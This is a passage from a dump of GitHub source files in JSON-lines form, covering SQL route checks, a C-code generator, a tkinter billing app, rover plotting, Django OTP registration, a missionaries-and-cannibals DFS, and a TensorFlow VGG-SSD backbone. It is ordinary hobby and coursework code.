TO_NUMBER(VTP.ID_ELEMENTO) AS ID_ELEM_INT,\n NVL(VTP.NOTA_VIA, '') as NOTA_VIA\n FROM V_TAPPE_ELEMENTI_PERCORSI VTP\n inner join (select MAX(CPVT.DATA_PREVISTA) data_prevista, CPVT.ID_PERCORSO\n from CONS_PERCORSI_VIE_TAPPE CPVT\n where CPVT.DATA_PREVISTA<=TO_DATE(:t1,'DD/MM/YYYY') \n group by CPVT.ID_PERCORSO) PVT\n on PVT.ID_PERCORSO=VTP.ID_PERCORSO \n and vtp.data_prevista = pvt.data_prevista\n where VTP.ID_PERCORSO=:t2\n ORDER BY VTP.CRONOLOGIA,NUMERO_CIVICO,ID_ELEM_INT, NOTA_VIA\n ''' \n try:\n cur1.execute(sel_uo, (oggi1, cod_p))\n #cur1.rowfactory = makeDictFactory(cur1)\n tappe_uo=cur1.fetchall()\n except Exception as e:\n logger.error(sel_uo, oggi1, cod_p)\n logger.error(e)\n \n curr1.close() \n cur1.close() \n logger.debug('Trovate {} tappe su SIT per il percorso {}'.format(len(tappe_sit),cod_p))\n logger.debug('Trovate {} tappe su UO per il percorso {}'.format(len(tappe_uo),cod_p))\n \n logger.debug(tappe_sit[1][1])\n logger.debug(tappe_uo[1][1])\n\n \n \n \n if cfr_tappe(tappe_sit, tappe_uo, logger)==0 :\n logger.info('Percorso {} già importato con data antecedente. Non ci sono state modifiche sostanziali.'.format(cod_p))\n else: \n logger.info('Percorso {} già importato con data antecedente ma da reimportare (ci sono cose che non tornano).'.format(cod_p))\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n # CHIUDO LE CONNESSIONI \n logger.info(\"Chiudo definitivamente le connesioni al DB\")\n con.close()\n conn.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"amiugete/script_sit_amiu","sub_path":"test_tappe.py","file_name":"test_tappe.py","file_ext":"py","file_size_in_byte":7971,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26546086160","text":"##########################################################################\n# This file is part of ssm.\n#\n# ssm is free software: you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# ssm is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with ssm. If not, see\n# .\n#########################################################################\n\nimport os\nimport os.path\nimport tarfile\nimport shutil\nimport json\n\nfrom Ccoder import Ccoder\nfrom Data import Data\n\nfrom jinja2 import Environment, FileSystemLoader\n\nclass Builder(Data, Ccoder):\n \"\"\"build a model\"\"\"\n\n def __init__(self, path_rendered, dpkgRoot, dpkg, **kwargs):\n Ccoder.__init__(self, dpkgRoot, dpkg, **kwargs)\n Data.__init__(self, path_rendered, dpkgRoot, dpkg, **kwargs)\n\n self.path_rendered = os.path.abspath(unicode(path_rendered, 'utf8'))\n self.env = Environment(loader=FileSystemLoader(os.path.join(self.path_rendered, 'C', 'templates')))\n self.env.filters.update({\n 'is_prior': lambda x: ('require' in x) and ('fields' not in x['require']) and ('data' in x) and ('distribution' in x['data'])\n })\n\n def prepare(self, path_templates=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'C', 'templates'), replace=True):\n \"\"\"\n copy templates to path_rendered\n \"\"\"\n\n ##this function is called only when a new user has created or edited a model whose name is unique (primary key) so it is the only one able to recreate a model...\n if replace:\n if os.path.exists(self.path_rendered):\n shutil.rmtree(self.path_rendered)\n\n #copy templates to uploads/rendered/user_name/model_id\n if not os.path.exists(self.path_rendered):\n shutil.copytree(path_templates, os.path.join(self.path_rendered, 'C', 'templates'))\n\n def archive(self, replace=True):\n \"\"\"make a tarball\"\"\"\n\n tar = tarfile.open(os.path.join(os.path.dirname(self.path_rendered), os.path.basename(self.path_rendered)+'.tar.gz'), \"w:gz\")\n tar.add(self.path_rendered, arcname=os.path.basename(self.path_rendered))\n tar.close()\n\n if replace:\n if os.path.exists(self.path_rendered):\n shutil.rmtree(self.path_rendered)\n\n def render(self, prefix, data):\n\n template = self.env.get_template(prefix + '_template.c')\n with open(os.path.join(self.path_rendered, 'C', 'templates', prefix + \".c\"), \"w\") as f:\n f.write(template.render(data))\n os.remove(os.path.join(self.path_rendered, 'C', 'templates', prefix + '_template.c'))\n\n def code(self):\n \"\"\"generate C code for MIF, Simplex, pMCMC, Kalman, simulation, ...\"\"\"\n\n is_diff = True if len(self.par_diff) > 0 else False\n\n orders = self.orders()\n\n ##methods whose results are use multiple times\n step_ode_sde = self.step_ode_sde()\n jac = self.jac(step_ode_sde['sf'])\n\n self.render('ode_sde', {'is_diff': is_diff, 'step':step_ode_sde, 'orders': orders})\n\n parameters = self.parameters()\n parameters['orders'] = orders\n self.render('transform', parameters)\n self.render('input', parameters)\n\n observed = self.observed()\n observed['orders'] = orders\n observed['h_grads'] = self.h_grads()\n self.render('observed', observed)\n\n self.render('iterator', {'iterators':self.iterators()})\n\n psr = {\n 'orders': orders,\n 'alloc': self.alloc_psr(),\n 'is_diff': is_diff,\n 'white_noise': self.white_noise,\n 'step': self.step_psr(),\n 'step_inc': self.step_psr_inc(),\n 'psr_multinomial': self.step_psr_multinomial()\n }\n self.render('psr', psr)\n\n self.render('diff', {'diff': self.compute_diff(), 'orders': orders})\n\n self.render('Q', {'Q': self.eval_Q(), 'is_diff': is_diff, 'orders': orders})\n\n self.render('Ht', {'Ht': self.Ht(), 'is_diff': is_diff, 'orders': orders})\n\n self.render('jac', {'jac': jac, 'is_diff': is_diff, 'orders': orders})\n\n self.render('step_ekf', {'is_diff': is_diff, 'step': step_ode_sde, 'orders': orders})\n\n self.render('check_IC', parameters)\n\n def write_data(self):\n\n reset_all = []\n for x in self.obs_model:\n reset_all += [self.order_states[s] for s in self.get_inc_reset(x)]\n\n x = {'start': self.t0.isoformat(), 'data': self.prepare_data(), 'covariates': self.prepare_covariates(), 'reset_all': list(set(reset_all))}\n with open(os.path.join(self.path_rendered, \".data.json\"), \"w\") as f:\n json.dump(x, f)\n\n\n\nif __name__==\"__main__\":\n\n\n dpkgRoot = os.path.join('..' ,'examples', 'foo')\n dpkg = json.load(open(os.path.join(dpkgRoot, 'package.json')))\n b = Builder(os.path.join(dpkgRoot, 'bin'), dpkgRoot, dpkg)\n\n b.prepare()\n b.code()\n b.write_data()\n","repo_name":"StateSpaceModels/ssm","sub_path":"src/Builder.py","file_name":"Builder.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"54"} +{"seq_id":"24111770660","text":"from tkinter import *\nfrom tkinter import ttk\n \ndef pay():\n totall = float(tot.cget(\"text\"))\n pay = float(e11.get())\n bal = pay - totall\n balText.set(bal)\n \n \n \ndef selection():\n selection = radio.get()\n selection1 = radio1.get()\n qty = int(e1.get())\n if(selection==1):\n if(selection1 ==1):\n item = \"Roll\"\n inge = \"veg\"\n price = 50\n tot = int(price * qty)\n tempList = [[item + \" \" + inge , price, qty, tot]]\n tempList.sort(key=lambda e: e[1], reverse=True)\n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n elif (selection1 == 2):\n item = \"Roll\"\n inge = \"chicken\"\n price = 100\n tot = int(price * qty)\n tempList = [[item + \" \" + inge, price, qty, tot]]\n tempList.sort(key=lambda e: e[1], reverse=True)\n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n elif (selection1 == 3):\n item = \"Roll\"\n inge = \"Fish\"\n price = 80\n tot = int(price * qty)\n tempList = [[item + \" \" + inge, price, qty, tot]]\n tempList.sort(key=lambda e: e[1], reverse=True)\n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection == 2):\n \n if (selection1 == 1):\n \n item = \"Pasty\"\n \n inge = \"veg\"\n \n price = 80\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection1 == 2):\n \n item = \"Pasty\"\n \n inge = \"chicken\"\n \n price = 90\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection1 == 3):\n \n item = \"Pasty\"\n \n inge = \"Fish\"\n \n price = 120\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n elif (selection == 3):\n \n if (selection1 == 1):\n \n item = \"Bun\"\n \n inge = \"veg\"\n \n price = 60\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection1 == 2):\n \n item = \"Bun\"\n \n inge = \"chicken\"\n \n price = 70\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n \n elif (selection1 == 3):\n \n item = \"Bun\"\n \n inge = \"Fish\"\n \n price = 40\n \n tot = int(price * qty)\n \n tempList = [[item + \" \" + inge, price, qty, tot]]\n \n tempList.sort(key=lambda e: e[1], reverse=True)\n \n for i, (item, price, qty, tot) in enumerate(tempList, start=1):\n listBox.insert(\"\", \"end\", values=(item, price, qty, tot))\n \n sum1 = 0.0\n for child in listBox.get_children():\n sum1 += float(listBox.item(child, 'values')[3])\n totText.set(sum1)\n \n \n \n \n \ntop = Tk()\ntop.geometry(\"800x500\")\ntop.title(\"Restaurant Inventory System Python par Berenger\")\n \nradio = IntVar()\nradio1 = IntVar()\nglobal totText\nglobal balText\ntotText = StringVar()\nbalText = IntVar()\nR1 = Radiobutton(top, text=\"Roll\", variable=radio, value=1)\nR1.pack(anchor=W)\nR1.place(x=10,y=10)\n \nR2 = Radiobutton(top, text=\"Pasty\", variable=radio, value=2)\nR2.pack(anchor=W)\nR2.place(x=10,y=40)\n \nR3 = Radiobutton(top, text=\"Bun\", variable=radio, value=3)\nR3.pack(anchor=W)\nR3.place(x=10,y=70)\n \n \n \nR4 = Radiobutton(top, text=\"Veg\", variable=radio1, value=1)\nR4.pack(anchor=W)\nR4.place(x=80,y=10)\n \nR2 = Radiobutton(top, text=\"Chicken\", variable=radio1, value=2)\nR2.pack(anchor=W)\nR2.place(x=80,y=40)\n \nR3 = Radiobutton(top, text=\"Fish\", variable=radio1, value=3)\nR3.pack(anchor=W)\nR3.place(x=80,y=70)\n \ne1 = Entry(top)\ne1.place(x=80, y=100)\nLabel(top, text=\"Qty\").place(x=10, y=100)\n \ntot = Label(top, text=\"\",font=\"arial 22 bold\", textvariable=totText)\ntot.place(x=450, y=10)\n \nButton(top, text=\"Add\",command = selection,height=3, width= 13).place(x=80, y=130)\n \n \n \ne11 = Entry(top)\ne11.place(x=450, y=50)\n \ne12 = Entry(top)\n \nbalance = Label(top, text=\"\",font=\"arial 22 bold\", textvariable=balText).place(x=450, y=80)\nButton(top, text=\"PayNow\",command = pay,height=3, width= 13).place(x=650, y=120)\n \n \ncols = ('item', 'price', 'qty','total')\nlistBox = ttk.Treeview(top, columns=cols, show='headings')\n \nfor col in cols:\n listBox.heading(col, text=col)\n listBox.grid(row=1, column=0, columnspan=2)\n listBox.place(x=10, y=220)\n \ntop.mainloop()\n","repo_name":"berengerbenam/Python","sub_path":"systeme_inventaire_de_restaurant.py","file_name":"systeme_inventaire_de_restaurant.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32153138243","text":"#!/usr/bin/env python \n\nimport argparse\nimport matplotlib.pyplot as plt\nimport data_decoder\n\ndef main(): \n parser = argparse.ArgumentParser(description=\"Create a plots from a rover log. Each plot will be \\\n saved as an individual file in the local directory.\")\n parser.add_argument(\"filepath\")\n parser.add_argument('-a','--all',action='store_true',help=\"Create all available plots. Default if no options are given.\")\n parser.add_argument('--sonar_plot',action='store_true',help=\"Create a plot of sonar data.\")\n parser.add_argument('--steering_plot',action='store_true',help=\"Create a plot of commanded steering data.\")\n\n args = parser.parse_args()\n\n # if no specific output option is request then all ouput options will be completed\n if not (args.all or args.sonar_plot or args.steering_plot):\n args.all = True\n\n # Create a plot for sonar data\n if args.all == True or args.sonar_plot:\n sonar_1 = []\n sonar_2 = []\n sonar_3 = []\n sonar_4 = []\n sonar_5 = []\n with open(args.filepath) as fp:\n cnt5 = 0\n x_sonar=[]\n for line in fp:\n msg_str, msg = data_decoder.read_log_dataline(line)\n if msg_str.split('Stamped')[-1] == 'Sonar':\n cnt5 +=1\n x_sonar.append(cnt5)\n sonar_1.append(msg.ping1) \n sonar_2.append(msg.ping2) \n sonar_3.append(msg.ping3) \n sonar_4.append(msg.ping4) \n sonar_5.append(msg.ping5) \n\n plt.clf()\n plt.plot(x_sonar, sonar_1, label=\"far left\")\n plt.plot(x_sonar, sonar_2, label=\"mid left\")\n plt.plot(x_sonar, sonar_3, label=\"front\")\n plt.plot(x_sonar, sonar_4, label=\"mid right\")\n plt.plot(x_sonar, sonar_5, label=\"far right\")\n plt.xlim(-5, cnt5 + 20)\n plt.legend()\n plt.savefig(\"sonar_plot.png\")\n\n # Create a plot for commanded steering data\n if args.all == True or args.steering_plot:\n steering = []\n with open(args.filepath) as fp:\n cnt6 = 0\n x_steer=[]\n for line in fp:\n msg_str, msg = data_decoder.read_log_dataline(line)\n if msg_str.split('Stamped')[-1] == 'Control':\n cnt6 +=1\n x_steer.append(cnt6)\n steering.append(msg.steering) \n\n plt.clf()\n plt.plot(x_steer, steering)\n plt.savefig(\"steering_plot.png\")\n \nif __name__ == '__main__':\n main()\n","repo_name":"MINDS-i/MINDS-i-Debugger","sub_path":"scripts/make_plots.py","file_name":"make_plots.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"44000691787","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.contrib import messages\nfrom utils import send_otp_code\nfrom .models import OtpCode, User\nfrom random import randint\n\nfrom .forms import UserRegistrationForm, VerifyCodeForm\n\n\nclass UserRegisterView(View):\n form_class = UserRegistrationForm\n templates_class = \"accounts/register.html\"\n\n def get(self, request):\n form = self.form_class\n return render(request, self.templates_class, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n\n if form.is_valid():\n cd = form.cleaned_data\n random_code = randint(1000, 9999)\n #when we connect to api service recomment this code\n #send_otp_code(cd['phone'], random_code)\n OtpCode.objects.create(phone_number=cd['phone'], code=random_code)\n request.session['user_registration_info'] = {\n 'phone_number': cd['phone'],\n 'email': cd['email'],\n 'full_name': cd['full_name'],\n 'password': cd['password'],\n }\n messages.success(request, 'we send message to you', 'success')\n return redirect(\"accounts:verify_code\")\n return render(request, self.templates_class, {'form': form})\n\n\nclass UserRegisterVerifyCodeView(View):\n class_form = VerifyCodeForm\n\n def get(self, request):\n form = self.class_form\n return render(request, 'accounts/verify.html', {'form': form})\n\n def post(self, request):\n user_session = request.session['user_registration_info']\n code_instance = OtpCode.objects.get(phone_number=user_session['phone_number'])\n\n form = self.class_form(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n if cd['code'] == code_instance.code:\n User.objects.create(phone_number=user_session['phone_number']\n , email=user_session['email']\n , full_name=user_session['full_name']\n , password=user_session['password'])\n code_instance.delete()\n messages.success(request, \"you registered successfully\", 'success')\n return redirect(\"home:home\")\n else:\n messages.error(request, 'code was incorrect', 'danger')\n return redirect('accounts:verify_code')\n else:\n messages.error(request, 'form got error', 'danger')\n return redirect(\"home:home\")\n","repo_name":"mrkingali/shop","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74365205920","text":"# Academicos:\n# - Ana Gabrielly Mendes Pedroso\n# - Davidson Denis Ferreira Guimaraes\n# - Larissa Fraga Pinto\n\ndef formata_saida(no):\n return '[' + str(no.get_canibais()) + ',' + str(no.get_missionarios()) + ',' + str(no.get_bote()) + ']'\n\n\ndef compara_nos(no1, no2):\n comparacao = False\n if no1.get_canibais() == no2.get_canibais() \\\n and no1.get_missionarios() == no2.get_missionarios() \\\n and no1.get_bote() == no2.get_bote():\n comparacao = True\n\n return comparacao\n\n\nclass No:\n\n def __init__(self, qtdCanibais, qtdMissionarios, qtdBoteMargemEsquerda):\n self.qtdCanibais = qtdCanibais\n self.qtdMissionarios = qtdMissionarios\n self.qtdBoteMargemEsquerda = qtdBoteMargemEsquerda\n self.listaNosPais = []\n self.listaNosFilhos = []\n self.solucao_e_ordem_de_visita = []\n\n def get_canibais(self):\n return self.qtdCanibais\n\n def get_missionarios(self):\n return self.qtdMissionarios\n\n def get_bote(self):\n return self.qtdBoteMargemEsquerda\n\n def get_lista_pais(self):\n return self.listaNosPais\n\n def get_lista_filhos(self):\n return self.listaNosFilhos\n\n def verifica_validade(self):\n verificacao = False\n\n if 0 <= self.get_canibais() <= 3 and 0 <= self.get_missionarios() <= 3 \\\n and (self.get_missionarios() == 0\n or self.get_missionarios() == 3\n or self.get_missionarios() == self.get_canibais()):\n\n verificacao = True\n\n return verificacao\n\n def adiciona_pai(self, novopai):\n if self.pai_nao_eh_filho(novopai):\n self.listaNosPais.append(novopai)\n\n def adiciona_filho(self, novofilho):\n if self.filho_nao_eh_pai(novofilho):\n self.listaNosFilhos.append(novofilho)\n\n def pai_nao_eh_filho(self, pai):\n verificacao = True\n for no in self.get_lista_filhos():\n if compara_nos(no, pai):\n verificacao = False\n return verificacao\n\n def filho_nao_eh_pai(self, novofilho):\n verificacao = True\n for no in self.get_lista_pais():\n if compara_nos(no, novofilho):\n verificacao = False\n return verificacao\n\n def set_solucao_ordem_de_visita(self,id_solucao_ordem_da_visita, ordem_de_visita):\n aux = [id_solucao_ordem_da_visita,ordem_de_visita]\n self.solucao_e_ordem_de_visita.append(aux)\n\n def get_solucao_ordem_visita(self):\n return self.solucao_e_ordem_de_visita\n\nclass Grafo:\n\n def __init__(self, noInicial,noFinal, movimentosPossiveis):\n self.noInicial = noInicial\n self.noFinal = noFinal\n self.movimentosPossiveis = movimentosPossiveis\n self.nos_grafo = []\n self.nos_grafo.append(noInicial)\n\n def get_lista_nos_grafo(self):\n return self.nos_grafo\n\n def gerar_grafo(self):\n for no in self.nos_grafo:\n self.gerar_nos_filhos(no)\n\n print('Estados do grafo gerado')\n for no in self.nos_grafo:\n print(formata_saida(no) + ' Filhos: '+' '.join([str(formata_saida(v)) for v in no.get_lista_filhos()]) + '\\n\\t\\tPais: '+' '.join([str(formata_saida(v)) for v in no.get_lista_pais()]))\n print('='*30)\n\n def gerar_nos_filhos(self, no_pai):\n if not compara_nos(no_pai, self.noFinal):\n for movimento in self.movimentosPossiveis:\n canibais = 0\n missionarios = 0\n bote = -1\n no_filho = None\n\n if no_pai.get_bote() == 1:\n canibais = no_pai.get_canibais() - movimento.get_canibais_no_barco()\n missionarios = no_pai.get_missionarios() - movimento.get_missionarios_no_barco()\n bote = 0\n\n else:\n canibais = no_pai.get_canibais() + movimento.get_canibais_no_barco()\n missionarios = no_pai.get_missionarios() + movimento.get_missionarios_no_barco()\n bote = 1\n\n if 0 <= canibais <= 3 and 0 <= missionarios <= 3:\n no_filho = No(canibais, missionarios, bote)\n if not compara_nos(no_filho, self.noInicial):\n if no_filho.verifica_validade():\n self.geracao_final(no_filho, no_pai)\n\n def geracao_final(self, no_recem_criado, novo_pai):\n no_ja_foi_criado = False\n for no_grafo in self.nos_grafo:\n for no_filho_grafo in no_grafo.get_lista_filhos():\n if compara_nos(no_recem_criado, no_filho_grafo):\n no_ja_foi_criado = True\n no_filho_grafo.adiciona_pai(novo_pai)\n novo_pai.adiciona_filho(no_filho_grafo)\n break\n if no_ja_foi_criado:\n break\n\n if not no_ja_foi_criado:\n no_recem_criado.adiciona_pai(novo_pai)\n novo_pai.adiciona_filho(no_recem_criado)\n self.nos_grafo.append(no_recem_criado)\n\n\nclass DFS:\n\n def __init__(self, grafo, estadoInicial, estadoFinal):\n self.fronteira = []\n self.nos_visitados = []\n self.estadoInicial = estadoInicial\n self.estadoFinal = estadoFinal\n self.grafo = grafo\n self.solucao_atual = 1\n self.ordem_de_visita = 1\n self.fronteira.append(estadoInicial)\n\n def printa_nos_visitados(self):\n ordem = 1\n for no in self.nos_visitados:\n for solucao in no.get_solucao_ordem_visita():\n if self.solucao_atual == solucao[0] and ordem == solucao[1]:\n print(formata_saida(no))\n ordem += 1\n\n def printa_fronteira(self):\n for no in self.fronteira:\n print(formata_saida(no))\n\n def busca_em_profundidade(self):\n if len(self.fronteira) > 0:\n no = self.fronteira.pop()\n\n print(\"\\nNó que será visitado:\")\n print(formata_saida(no))\n print(\"\\nFronteira antes da visita:\")\n self.printa_fronteira()\n self.nos_visitados.append(no)\n no.set_solucao_ordem_de_visita(self.solucao_atual, self.ordem_de_visita)\n self.ordem_de_visita += 1\n self.coloca_filhos_na_fronteira(no)\n print(\"\\nFronteira depois da visita:\")\n self.printa_fronteira()\n print('-' * 30)\n\n if compara_nos(no, self.estadoFinal):\n self.formata_saida_solucao_encontrada(no)\n\n self.busca_em_profundidade()\n\n def coloca_filhos_na_fronteira(self, no):\n for no_filho in no.get_lista_filhos():\n self.fronteira.append(no_filho)\n\n def formata_saida_solucao_encontrada(self, no_disparo):\n print('#' * 30)\n print(str(self.solucao_atual) +'ª SOLUÇÃO ENCONTRADA: ')\n self.printa_nos_visitados()\n self.solucao_atual += 1\n self.adiciona_solucao_atual_a_todos_nos_visitados(no_disparo)\n self.ordem_de_visita = 1\n print('#' * 30)\n\n def adiciona_solucao_atual_a_todos_nos_visitados(self, no_disparo):\n for no in self.nos_visitados:\n primeira_solucao_no = no.get_solucao_ordem_visita()[0]\n irmaos = self.get_irmaos_estao_na_fronteira(no)\n irmao_disparou_solucao = False\n for no_irmao in irmaos:\n if compara_nos(no_disparo,no_irmao):\n irmao_disparou_solucao = True\n break\n\n if len(irmaos) == 0 or not irmao_disparou_solucao:\n no.set_solucao_ordem_de_visita(self.solucao_atual, primeira_solucao_no[1])\n\n def get_irmaos_estao_na_fronteira(self, no):\n irmaos = []\n for pai in no.get_lista_pais():\n for filho_desse_pai in pai.get_lista_filhos():\n if not compara_nos(filho_desse_pai, no) and self.verifica_se_estado_esta_na_fronteira(filho_desse_pai):\n irmaos.append(filho_desse_pai)\n\n return irmaos\n\n def verifica_se_estado_esta_na_fronteira(self,estado_comparacao):\n verificacao = False\n for no in self.fronteira:\n if compara_nos(no, estado_comparacao):\n verificacao = True\n return verificacao\n\n\nclass Movimento:\n\n def __init__(self, qtd_canibais_no_barco, qtd_missionarios_no_barco):\n self.qtd_canibais_no_barco = qtd_canibais_no_barco\n self.qtd_missionarios_no_barco = qtd_missionarios_no_barco\n\n def get_canibais_no_barco(self):\n return self.qtd_canibais_no_barco\n\n def get_missionarios_no_barco(self):\n return self.qtd_missionarios_no_barco","repo_name":"AnaGMendesPedroso/IA-Algoritmos_Busca","sub_path":"src/missionarios/profundidade/profundidade.py","file_name":"profundidade.py","file_ext":"py","file_size_in_byte":8649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21899382792","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n#from tensorflow.contrib import layers\n#from tensorflow.contrib.framework.python.ops import arg_scope\n#from tensorflow.contrib.layers.python.layers import layers as layers_lib\n#from tensorflow.contrib.layers.python.layers import regularizers\n#from tensorflow.contrib.layers.python.layers import utils\n#from tensorflow.python.ops import array_ops\n#from tensorflow.python.ops import init_ops\n#from tensorflow.python.ops import nn_ops\n#from tensorflow.python.ops import variable_scope\n#import tensorflow.contrib.slim as slim\n\n\n\ndef conv_block(infeat, ntimes, nfeat, prefix):\n ret = infeat \n for ii in range(ntimes):\n vname = prefix+'/'+prefix+'_'+str(ii+1)\n ret = tf.layers.conv2d(ret, nfeat, [3, 3], name=vname, padding='SAME', activation=tf.nn.relu, kernel_regularizer=tf.contrib.layers.l2_regularizer(0.0001),kernel_initializer = tf.contrib.layers.xavier_initializer(uniform=False))\n\n return ret\n\ndef vgg_16(inputs, scope='vgg_16'):\n\n endpoints={}\n #with variable_scope.variable_scope(scope, 'vgg_16', [inputs]) as sc:\n with tf.variable_scope(name_or_scope=scope, values=[inputs], reuse=tf.AUTO_REUSE):\n #net = layers_lib.repeat(inputs, 2, layers.conv2d, 64, [3, 3], scope='conv1')\n net = conv_block(inputs, 2, 64, 'conv1')\n net = tf.layers.max_pooling2d(net, pool_size = [2, 2], strides=[2, 2], padding = 'SAME', name='pool1')\n #net = layers_lib.repeat(net, 2, layers.conv2d, 128, [3, 3], scope='conv2')\n net = conv_block(net, 2, 128, 'conv2')\n net = tf.layers.max_pooling2d(net, pool_size=[2, 2], strides=[2, 2], padding = 'SAME', name ='pool2')\n #net = layers_lib.repeat(net, 3, layers.conv2d, 256, [3, 3], scope='conv3')\n net = conv_block(net, 3, 256, 'conv3')\n net = tf.layers.max_pooling2d(net, pool_size=[2, 2], strides=[2, 2], padding = 'SAME', name='pool3')\n #net = layers_lib.repeat(net, 3, layers.conv2d, 512, [3, 3], scope='conv4')\n net = conv_block(net, 3, 512, 'conv4')\n endpoints['conv4_3'] = net\n conv4_3out = net\n net = tf.layers.max_pooling2d(net, pool_size=[2, 2],strides=[2, 2], padding = 'SAME', name='pool4')\n #outputs_pool4 = net\n #net = layers_lib.repeat(net, 3, layers.conv2d, 512, [3, 3], scope='conv5')\n net = conv_block(net, 3, 512, 'conv5')\n\n endpoints['conv5_3'] = net\n # modified layers\n net = tf.layers.max_pooling2d(net,pool_size=[3, 3],strides=[1, 1],padding=\"SAME\",name='pool5') \n #outputs_pool5 = net\n endpoints['pool5'] = net\n\n # dilate 3,3 for pool5 w/ stride 2; dilate 6, for stride 1\n net = tf.layers.conv2d(net, 1024, [3, 3], strides=[1, 1], dilation_rate=[6,6], padding='SAME', name = 'fc6',activation=tf.nn.relu, kernel_regularizer=tf.contrib.layers.l2_regularizer(0.0001),kernel_initializer = tf.contrib.layers.xavier_initializer(uniform=False))\n endpoints['fc6'] = net\n\n net = tf.layers.conv2d(net, 1024, [1, 1], strides=[1, 1], padding='SAME', name = 'fc7',activation=tf.nn.relu, kernel_regularizer=tf.contrib.layers.l2_regularizer(0.0001),kernel_initializer = tf.contrib.layers.xavier_initializer(uniform=False))\n endpoints['fc7'] = net\n fc7out = net\n\n return [conv4_3out, fc7out]\n #return [endpoints['conv4_3'], endpoints['fc7']]\n\n\ndef net(inputs, data_format='channels_last', VGG_PARAMS_FILE= None, is_train=False):\n\n if data_format != \"channels_last\":\n print('only works for channels last now')\n return None\n outputs = vgg_16(inputs)\n return outputs\n\n","repo_name":"paragt/TF-SSD","sub_path":"VGG-SSD/my_vgg3.py","file_name":"my_vgg3.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35860609345","text":"#!/usr/bin/env python\n#coding:utf-8\n\"\"\"\n Author: WUsf --\n Purpose: \n Created: 2015/12/15\n\"\"\"\n\nimport Configs.RootPath as Root\nfrom ConfigParser import ConfigParser\n\nRootPath = Root.RootPath\n\n#----------------------------------------------------------------------\ndef GetLocalDatabasePath():\n \"\"\"\"\"\"\n configPath = \"\\\\Configs\\\\DatabaseInfo.cfg\"\n dbCfg = ConfigParser()\n dbCfg.optionxform = str \n dbCfg.read(RootPath + configPath) \n return {\"EquityDataRaw\":dbCfg.get(\"Local\", \"EquityDataRaw\"),\n \"EquityDataRefined\":dbCfg.get(\"Local\", \"EquityDataRefined\")}\n","repo_name":"wusf/MyQunatLib","sub_path":"Tools/GetLocalDatabasePath.py","file_name":"GetLocalDatabasePath.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42260213495","text":"budget = float(input())\nnumber_of_actors = int(input())\nprice_for_clothes_per_actor = float(input())\n\ndecor = budget * 0.1\nif number_of_actors > 150:\n price_for_clothes_per_actor *= 0.9\n\nsum_for_filming = decor + price_for_clothes_per_actor * number_of_actors\n\ndifference = abs(budget - sum_for_filming)\nif sum_for_filming <= budget:\n print(\"Action!\")\n print(f\"Wingard starts filming with {difference:.2f} leva left.\")\nelse:\n print(\"Not enough money!\")\n print(f\"Wingard needs {difference:.2f} leva more.\")\n","repo_name":"zefirnikolov/SoftUni","sub_path":"Python 